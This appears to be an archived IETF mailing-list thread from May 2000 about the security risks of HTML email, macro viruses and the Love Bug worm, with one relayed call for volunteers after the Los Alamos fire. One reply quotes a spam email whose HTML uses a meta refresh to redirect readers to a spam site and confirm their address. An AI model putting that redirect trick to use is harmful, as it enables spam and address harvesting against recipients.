> running scripts, you have done nothing, because the virus script runs when
> you close the document and turns the option back off again.
>
> At least not allowing macros to disable the don't-run-macros option seems
> reasonable to me, but it seemed to have escaped the engineers who created
> Microsoft Word.
>
> Doug Sauder
> Software Engineer
> Broadsoft, Inc
>
>
>From owner-ietf-outbound Fri May 12 10:40:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA02969
for [EMAIL PROTECTED]; Fri, 12 May 2000 10:40:02 -0400 (EDT)
Received: from aharp.is-net.depaul.edu (aharp.is-net.depaul.edu [140.192.91.90])
by ietf.org (8.9.1a/8.9.1a) with SMTP id KAA02849
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 10:33:32 -0400 (EDT)
Received: (qmail 10338 invoked from network); 12 May 2000 14:33:06 -0000
Received: from aharp.is-net.depaul.edu (HELO depaul.edu) (140.192.91.90)
by aharp.is-net.depaul.edu with SMTP; 12 May 2000 14:33:06 -0000
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 09:33:02 -0500
From: John Kristoff <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
X-Mailer: Mozilla 4.72 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
John Stracke wrote:
> Well, there's basic formatting:
[...]
> And even simple links (never mind forms, applets, etc.) are great for,
> say, workflow applications. When I worked for Netscape, HR made great
> use of HTML mail in the internal network. When I wanted to take some
Email is not the web.
John
>From owner-ietf-outbound Fri May 12 11:00:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA03462
for [EMAIL PROTECTED]; Fri, 12 May 2000 11:00:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA03118
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 10:51:43 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4CEpdx14248;
Fri, 12 May 2000 10:51:39 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Fri, 12 May 2000 09:33:02 CDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 12 May 2000 10:51:39 -0400
X-Loop: [EMAIL PROTECTED]
On Fri, 12 May 2000 09:33:02 CDT, John Kristoff <[EMAIL PROTECTED]> said:
> John Stracke wrote:
> > Well, there's basic formatting:
> [...]
> > And even simple links (never mind forms, applets, etc.) are great for,
> > say, workflow applications. When I worked for Netscape, HR made great
> > use of HTML mail in the internal network. When I wanted to take some
>
> Email is not the web.
On the other hand, e-mail does a MUCH better job of some things than the web
does. In particular, if you do workflow via e-mail (especially with PGP or
other authentication/encryption), you can send the object to the next person
that needs it, and *NOT* expose it to the rest of the world.
If you do it web-based, you then have all the ugly issues of getting it onto
the webserver, setting access controls on it so that only the intended person
can get at it, etc etc etc.
Incidentally, this is exactly the same issue as "attach a file to an e-mail"
versus "send the recipient a note, copy the file to a ftp/web server, wait
for him to retrieve it, and then remember to clean it up afterwards".
Let's face it guys - unless we collectively come up with a better way to
do it, there's going to be a continued push towards having more "push" style
interaction via e-mail. RFC1440 (Sender-Initiated File Transfer) appears
to be essentially dead, and no new contenders have arrived....
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Fri May 12 11:10:06 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA03708
for [EMAIL PROTECTED]; Fri, 12 May 2000 11:10:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA03367
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 10:59:10 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id JAA02316;
Fri, 12 May 2000 09:58:52 -0400
Date: Fri, 12 May 2000 09:58:52 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<v04210125b540adedd536@[130.237.150.138]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <v04210125b540adedd536@[130.237.150.138]>; from [EMAIL PROTECTED] on Thu,
May 11, 2000 at 08:36:52PM +0200
X-Loop: [EMAIL PROTECTED]
On Thu, May 11, 2000 at 08:36:52PM +0200, Jacob Palme wrote:
> At 10.11 -0600 0-05-11, Vernon Schryver wrote:
> > Once you restrict
> > HTML based email enough to be safe, why bother with anything more than
> > text and perhaps simple pictures?
> What is wrong with that. I use HTML-based e-mail mostly to
> inluce pictures in my messages.
> A very useful way of using HTML-based e-mail would also be
> to send out forms and fill them in via mail, but this does
> not work so well because some mailers does not handle such
> messages very good yet.
And of course, a day after posting my earlier reply to this message,
I receive this example of how useful HTML is in E-Mail:
[...]
] X-Mailer: DiffondiCool V3.1.1 (W95/NT) Delfino Solutions (Build: Nov 7 1998)
] Mime-Version: 1.0
] Date: Fri, 12 May 2000 21:33:03 +0800
] Content-Type: multipart/mixed; boundary="----=_NextPart_000_007F_01BDF6C7.FABAC1B0"
] Content-Transfer-Encoding: 7bit
]
] This is a MIME Message
]
] ------=_NextPart_000_007F_01BDF6C7.FABAC1B0
] Content-Type: text/plain; charset="iso-8859-1"
] Content-Transfer-Encoding: quoted-printable
]
]
] ------=_NextPart_000_007F_01BDF6C7.FABAC1B0
] Content-Type: text/html; name="unknown.htm"
] Content-Transfer-Encoding: quoted-printable
] Content-Description: unknown.htm
] Content-Disposition: inline; filename="unknown.htm"
]
] <html><head>
] <meta http-equiv=3D"refresh" content=3D"0;URL=3Dhttp://myad.cn99.com">
] </head></html>
]
] ------=_NextPart_000_007F_01BDF6C7.FABAC1B0--
Well gooollllleeeyyyy. I wonder what that piece of crap was
suppose to do. I'll bet this spammer thought I was stupid enough to
be using an HTML enabled reader that would just bounce me right to
his spam site where he would not only hit me with his cruft but
he would also know that his E-Mail hit paydirt and he had a good
address on this host. All without any active content at all. Oh
well... Guess he failed on this one. How many chumps do you think
he might have succeeded with?
I got hit with three copies of it (various permutations of
my addresses). I'll probably see more before the day is out. BTW...
According to the Received-By headers, the point of origin was in .cn,
so it will be a bloody cold day in hell before I'm able to do anything
about this clown. Grrr...
If people wouldn't use HTML readers, this trick wouldn't work
at all, and I wouldn't have to tolerate this cruft (yes, I know, they
would try something else but at least it wouldn't be this morally
offensive).
> --
> Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
> for more info see URL: http://www.dsv.su.se/jpalme/
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Fri May 12 12:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA05540
for [EMAIL PROTECTED]; Fri, 12 May 2000 12:10:02 -0400 (EDT)
Received: from psi.pair.com (psi.pair.com [209.68.1.39])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA05292
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 12:04:06 -0400 (EDT)
Received: from localhost (kodiak@localhost) by psi.pair.com (8.9.1/8.6.12) with ESMTP
id MAA04351 for <[EMAIL PROTECTED]>; Fri, 12 May 2000 12:04:08 -0400 (EDT)
X-Envelope-To: <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 12:04:08 -0400 (EDT)
From: chris d koeberle <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Approved: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Fri, 12 May 2000 [EMAIL PROTECTED] wrote:
> Incidentally, this is exactly the same issue as "attach a file to an e-mail"
> versus "send the recipient a note, copy the file to a ftp/web server, wait
> for him to retrieve it, and then remember to clean it up afterwards".
Only if the e-mail client in question automatically executes the attached
file.
Indeed, I don't think any of the people who are complaining about the
"HTML in e-mail" issues would complain about someone sending an e-mail
with an HTML file as an attachment. At least, not as I understand their
arguments against it.
At any rate, it is certainly not "exactly the same issue" - people have
expounded upon the differences already.
-=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO,
people would sure have raised a stink.=-
>From owner-ietf-outbound Fri May 12 12:20:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA05982
for [EMAIL PROTECTED]; Fri, 12 May 2000 12:20:02 -0400 (EDT)
Received: from europe.std.com (europe.std.com [199.172.62.20])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA05338
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 12:04:58 -0400 (EDT)
Received: from world.std.com ([EMAIL PROTECTED] [199.172.62.5])
by europe.std.com (8.9.3/8.9.3) with ESMTP id MAA23972;
Fri, 12 May 2000 12:04:57 -0400 (EDT)
Received: from localhost (brunner@localhost)
by world.std.com (8.9.3/8.9.3) with SMTP id MAA27687;
Fri, 12 May 2000 12:04:56 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Authentication-Warning: world.std.com: brunner@localhost didn't use HELO protocol
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Fwd: URGENT: Los Alamos Fire: Network & Systems volunteers needed
Date: Fri, 12 May 2000 12:04:56 -0400
From: Eric Brunner <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
The National Indian Telecommunications Institute (NITI) run Digital Council
Fires (DCF) mailing list carries the following URGENT request for 10-15
Network & Systems volunteers to assist in the Los Alamos fire response.
The originator of the request is the New Mexico Information Technology and
Software Association (NMITSA), and was sent to New Mexico regional networks
yesterday. See the body of the forwarded message for details.
IETFers who can help please drop Steen Rasmussen ([EMAIL PROTECTED]) a note.
Eric
------- Forwarded Message
>Date: Thu, 11 May 2000 20:50:54 -0600
>To: dcf@niti.
>From: Lisa Nelmida <[EMAIL PROTECTED]>
>Subject: Fwd: Re: URGENT: LA Fire: 10-15 Network & Systems volunteers needed
>Bcc: [EMAIL PROTECTED],Rose Ebaugh
>
>
>>User-Agent: Microsoft Outlook Express Macintosh Edition - 5.01 (1630)
>>Date: Thu, 11 May 2000 16:20:56 +0000
>>Subject: Re: URGENT: LA Fire: 10-15 Network & Systems volunteers needed
>>From: Randy Burge <[EMAIL PROTECTED]>
>>CC: Steen Rasmussen <[EMAIL PROTECTED]>
>>
>>Email for Steen Rasmussen correction: [EMAIL PROTECTED] [I was given an
>>incorrect email address, I believe]
>>
>> >
>> > Subject: URGENT: LA Fire: 10-15 Network & Systems volunteers needed
>> >
>> > NMITSA: New Mexico Info Tech & Software Assn: 5/11/00, 4:10 pm
>> >
>> > RESPONSE to Los Alamos Fire: REQUEST for Volunteer Assistance from NM
>> based
>> > network and system ops professionals.
>> >
>> > If you are or know network and system professionals, please forward
>> this email
>> > to them immediately.
>> >
>> > 10-15 people are estimated to be needed, but there may be shift work
>> so let's
>> > bring all volunteers forward and sort out the details of need as we go.
>> >
>> >
>> > All interested people with requisite skills are urged to contact Steen
>> > Rasmussen at the Santa Fe Institute/LANL, coordinator of this project:
>> >
>> > cell phone: 505-670-6052
>> > SFI: 505-984-8800 ask for Steen
>> >
>> > email: [EMAIL PROTECTED]
>> >
>> > This system will help coordinate family contact tracking and many other
>> > essential communication functions between the various disaster
>> > relief/assistance/assessment organizations.
>> >
>> > Please contact Steen ASAP.
>> >
>> > NMITSA will be monitoring this disaster and offering its email
>> communication
>> > list to the cause of relief and recovery.
>> >
>> >
>> >
>> > -----------
>> > Randy Burge
>> > NMITSA: New Mexico Info Tech & Software Assn.
>> >
>> > 505-984-0622 Santa Fe office
>> > [EMAIL PROTECTED]
>> > -----------
>> >
Lisa A. Nelmida
Development Director
National Indian Telecommunications Institute
110 N. Guadalupe, STE 9
Santa Fe, NM 87501
[EMAIL PROTECTED]
505.986.3872 x103 (v)
505.989.4271 (f)
------- End of Forwarded Message
>From owner-ietf-outbound Fri May 12 12:40:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA06718
for [EMAIL PROTECTED]; Fri, 12 May 2000 12:40:02 -0400 (EDT)
Received: from saint.heaven.net (saint.heaven.net [198.69.28.164])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA06364
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 12:30:59 -0400 (EDT)
Received: (from stpeters@localhost)
by saint.heaven.net (8.9.3/8.9.3) id MAA23199;
Fri, 12 May 2000 12:30:58 -0400
From: "Dick St.Peters" <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 12:30:57 -0400 (EDT)
To: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
X-Mailer: VM 6.72 under Emacs 19.34.1
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Castro, Edison M. (PCA) writes:
> WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS!!!!!!!!!!!!
Yeah, right ... when it comes to shouting, all this "blame the victim"
has gone too far.
I have users who are *illiterate*. They can click, but they can't
read. They can click on little pictures and listen to greetings in
their native language or view videos of relatives they haven't seen in
decades. I refuse to believe this is bad.
Some of my illiterate users just haven't learned to read *yet*. They
will when they're old enough to go to school. However, it will be a
long time before they can comprehend that the computer screen is a
window into a world full of bad people who want to damage their
mommy's computer.
These users are here in the US. That the 'love bug' worm is believed
to have originated in the Philippines should be sufficient reminder
that not every potential victim is a literate English-speaking
resident of North Americal or Europe. It may be that technology has
no way for the network to protect villagers in Bangladesh or central
Africa. However, reaching that conclusion and saying the network
should not try as a matter of philosophical principle are very
different. Of course capable users should protect themselves as best
they can, but who is prepared to say that helpless users don't belong
on our Internet?
--
Dick St.Peters, [EMAIL PROTECTED]
Gatekeeper, NetHeaven, Saratoga Springs, NY
Saratoga/Albany/Amsterdam/BoltonLanding/Cobleskill/Greenwich/
GlensFalls/LakePlacid/NorthCreek/Plattsburgh/...
Oldest Internet service based in the Adirondack-Albany region
>From owner-ietf-outbound Fri May 12 13:00:28 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA07254
for [EMAIL PROTECTED]; Fri, 12 May 2000 13:00:03 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA06864
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 12:44:31 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id KAA18588
for [EMAIL PROTECTED] env-from <vjs>;
Fri, 12 May 2000 10:44:29 -0600 (MDT)
Date: Fri, 12 May 2000 10:44:29 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
X-Loop: [EMAIL PROTECTED]
> From: chris d koeberle <[EMAIL PROTECTED]>
> ...
> Indeed, I don't think any of the people who are complaining about the
> "HTML in e-mail" issues would complain about someone sending an e-mail
> with an HTML file as an attachment. At least, not as I understand their
> arguments against it.
Just as with sending any active MIME attachment including binary UNIX
programs, it depends on the attached HTML file and who sent it.
As as been pointed out repeatedly and as demonstrated with a concrete
example Saturday morning, attached HTML can be a significant security
problem. I doubt that (probably porn) HTML spam was much of a security
threat, but if you think about it for a little, you can surely see how
such things can be real security problems.
The practice of sending both HTML and cleartext of supposedly the same
message reflects very poorly on those who do it intentionally and on those
who cause MUA's to trick others into doing it unintentionally. Never mind
the security issues, but consider only the wastes of disk space, CPU
processing, network bandwidth, and the inevitable differences between the
two versions. If the two messages were the same, then there would be no
excuse for sending both. If they differ, then one must be wrong, and
sending both is worse than a waste.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Fri May 12 13:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA07543
for [EMAIL PROTECTED]; Fri, 12 May 2000 13:10:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA07030
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 12:50:44 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id LAA05401;
Fri, 12 May 2000 11:50:29 -0400
Date: Fri, 12 May 2000 11:50:29 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: chris d koeberle <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <[EMAIL PROTECTED]>; from
[EMAIL PROTECTED] on Fri, May 12, 2000 at 12:04:08PM -0400
X-Loop: [EMAIL PROTECTED]
On Fri, May 12, 2000 at 12:04:08PM -0400, chris d koeberle wrote:
> On Fri, 12 May 2000 [EMAIL PROTECTED] wrote:
> > Incidentally, this is exactly the same issue as "attach a file to an e-mail"
> > versus "send the recipient a note, copy the file to a ftp/web server, wait
> > for him to retrieve it, and then remember to clean it up afterwards".
> Only if the e-mail client in question automatically executes the attached
> file.
> Indeed, I don't think any of the people who are complaining about the
> "HTML in e-mail" issues would complain about someone sending an e-mail
> with an HTML file as an attachment. At least, not as I understand their
> arguments against it.
Wrong...
We object to is so strenuously that we've added global blocking
filters to majordomo at our site in "taboo-body". We've had one two
many come through with a hostile java script worm in it and then
had a few dozen people complain that we're distributing viruses and
a few hundred get burned by it. BTW... The site in question has
over 70 mailing lists with almost 50,000 unique addresses subscribed
to one or more lists. We can't tolerate html on the mailing lists
at all, if for no other reason than the administrative headache that
occurs when hostile content (active or not) propagates over any of the
lists.
> At any rate, it is certainly not "exactly the same issue" - people have
> expounded upon the differences already.
> -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO,
> people would sure have raised a stink.=-
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Fri May 12 13:40:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA08215
for [EMAIL PROTECTED]; Fri, 12 May 2000 13:40:02 -0400 (EDT)
Received: from escape.com ([EMAIL PROTECTED] [198.6.71.10])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA08094
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 13:33:49 -0400 (EDT)
Received: from localhost (xelsed@localhost) by escape.com (8.9.0/8.9.1) with ESMTP id
NAA02362; Fri, 12 May 2000 13:38:43 -0400 (EDT)
Date: Fri, 12 May 2000 13:38:43 -0400 (EDT)
From: Jeremy <[EMAIL PROTECTED]>
To: Vernon Schryver <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
Can you plase pleaes stop this Virus Thread.
-jeremy
On Fri, 12 May 2000, Vernon Schryver wrote:
> > From: chris d koeberle <[EMAIL PROTECTED]>
>
> > ...
> > Indeed, I don't think any of the people who are complaining about the
> > "HTML in e-mail" issues would complain about someone sending an e-mail
> > with an HTML file as an attachment. At least, not as I understand their
> > arguments against it.
>
> Just as with sending any active MIME attachment including binary UNIX
> programs, it depends on the attached HTML file and who sent it.
>
> As as been pointed out repeatedly and as demonstrated with a concrete
> example Saturday morning, attached HTML can be a significant security
> problem. I doubt that (probably porn) HTML spam was much of a security
> threat, but if you think about it for a little, you can surely see how
> such things can be real security problems.
>
> The practice of sending both HTML and cleartext of supposedly the same
> message reflects very poorly on those who do it intentionally and on those
> who cause MUA's to trick others into doing it unintentionally. Never mind
> the security issues, but consider only the wastes of disk space, CPU
> processing, network bandwidth, and the inevitable differences between the
> two versions. If the two messages were the same, then there would be no
> excuse for sending both. If they differ, then one must be wrong, and
> sending both is worse than a waste.
>
>
> Vernon Schryver [EMAIL PROTECTED]
>
>
>From owner-ietf-outbound Fri May 12 14:00:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA08580
for [EMAIL PROTECTED]; Fri, 12 May 2000 14:00:02 -0400 (EDT)
Received: from ztxmail03.ztx.compaq.com (ztxmail03.ztx.compaq.com [161.114.1.207])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA08486
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 13:54:57 -0400 (EDT)
Received: by ztxmail03.ztx.compaq.com (Postfix, from userid 12345)
id 5241A19B; Fri, 12 May 2000 12:54:28 -0500 (CDT)
Received: from excreo-gh02.reo.cpqcorp.net (excreo-gh02.reo.cpqcorp.net
[16.37.150.254])
by ztxmail03.ztx.compaq.com (Postfix) with ESMTP
id 7E39571D; Fri, 12 May 2000 12:54:27 -0500 (CDT)
Received: by excreo-gh02.reo.cpqcorp.net with Internet Mail Service (5.5.2650.21)
id <KZDNQ128>; Fri, 12 May 2000 18:54:26 +0100
Message-ID: <[EMAIL PROTECTED]>
From: "Parkinson, Jonathan" <[EMAIL PROTECTED]>
To: "'Dick St.Peters'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Date: Fri, 12 May 2000 18:54:25 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
No offence here people, but whilst we are on the subject of Virus's can we
change the Subject Title. I don't know who you all are and I'm getting
paranoid :-)
Thanks
Jon 'Scared Little Puppy'
-----Original Message-----
From: Dick St.Peters [mailto:[EMAIL PROTECTED]]
Sent: Friday, May 12, 2000 5:31 PM
To: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Castro, Edison M. (PCA) writes:
> WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS!!!!!!!!!!!!
Yeah, right ... when it comes to shouting, all this "blame the victim"
has gone too far.
I have users who are *illiterate*. They can click, but they can't
read. They can click on little pictures and listen to greetings in
their native language or view videos of relatives they haven't seen in
decades. I refuse to believe this is bad.
Some of my illiterate users just haven't learned to read *yet*. They
will when they're old enough to go to school. However, it will be a
long time before they can comprehend that the computer screen is a
window into a world full of bad people who want to damage their
mommy's computer.
These users are here in the US. That the 'love bug' worm is believed
to have originated in the Philippines should be sufficient reminder
that not every potential victim is a literate English-speaking
resident of North Americal or Europe. It may be that technology has
no way for the network to protect villagers in Bangladesh or central
Africa. However, reaching that conclusion and saying the network
should not try as a matter of philosophical principle are very
different. Of course capable users should protect themselves as best
they can, but who is prepared to say that helpless users don't belong
on our Internet?
--
Dick St.Peters, [EMAIL PROTECTED]
Gatekeeper, NetHeaven, Saratoga Springs, NY
Saratoga/Albany/Amsterdam/BoltonLanding/Cobleskill/Greenwich/
GlensFalls/LakePlacid/NorthCreek/Plattsburgh/...
Oldest Internet service based in the Adirondack-Albany region
>From owner-ietf-outbound Fri May 12 14:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA08912
for [EMAIL PROTECTED]; Fri, 12 May 2000 14:10:02 -0400 (EDT)
Received: from psi.pair.com (psi.pair.com [209.68.1.39])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA08493
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 13:54:59 -0400 (EDT)
Received: from localhost (kodiak@localhost) by psi.pair.com (8.9.1/8.6.12) with ESMTP
id NAA11343 for <[EMAIL PROTECTED]>; Fri, 12 May 2000 13:54:59 -0400 (EDT)
X-Envelope-To: <[EMAIL PROTECTED]>
Date: Fri, 12 May 2000 13:54:59 -0400 (EDT)
From: chris d koeberle <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Approved: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Fri, 12 May 2000, Vernon Schryver wrote:
> As as been pointed out repeatedly and as demonstrated with a concrete
> example Saturday morning, attached HTML can be a significant security
> problem. I doubt that (probably porn) HTML spam was much of a security
> threat, but if you think about it for a little, you can surely see how
> such things can be real security problems.
I think there's some confusion in terminology, here, possibly on my part.
Some mail clients permit the sending of an HTML _message_, where other
clients will automatically parse the HTML in the message as HTML instead
of plain text. I am trying desperately to distinguish between this
practice and the ability to attach HTML as a binary file.
Binary attached HTML presents a subset of the risks of all binary
attachments - you may, if you choose to open the attachment, be
disappointed in the results.
HTML as e-mail presents further risks for clients which are willing to
interpret the HTML (Outlook and Outlook Express both do this in their
default configuration.)
-=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO,
people would sure have raised a stink.=-
>From owner-ietf-outbound Fri May 12 14:30:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA09219
for [EMAIL PROTECTED]; Fri, 12 May 2000 14:30:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA08765
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:05:07 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e4CI58x37270
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:05:08 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Fri, 12 May 2000 13:38:43 EDT."
<[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 12 May 2000 14:05:07 -0400
X-Loop: [EMAIL PROTECTED]
On Fri, 12 May 2000 13:38:43 EDT, Jeremy said:
> Can you plase pleaes stop this Virus Thread.
Actually, there *ARE* important issues here.
Would the IESG support the creation of a WG to discuss these, with the
charter of producing a BCP documenting what *should* be done to minimize
these risks in today's internet?
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Fri May 12 14:40:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA09508
for [EMAIL PROTECTED]; Fri, 12 May 2000 14:40:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA08854
for <[EMAIL PROTECTED]>; Fri, 12 May 2000 14:08:27 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id LAA11217;
Fri, 12 May 2000 11:08:07 -0700 (PDT)
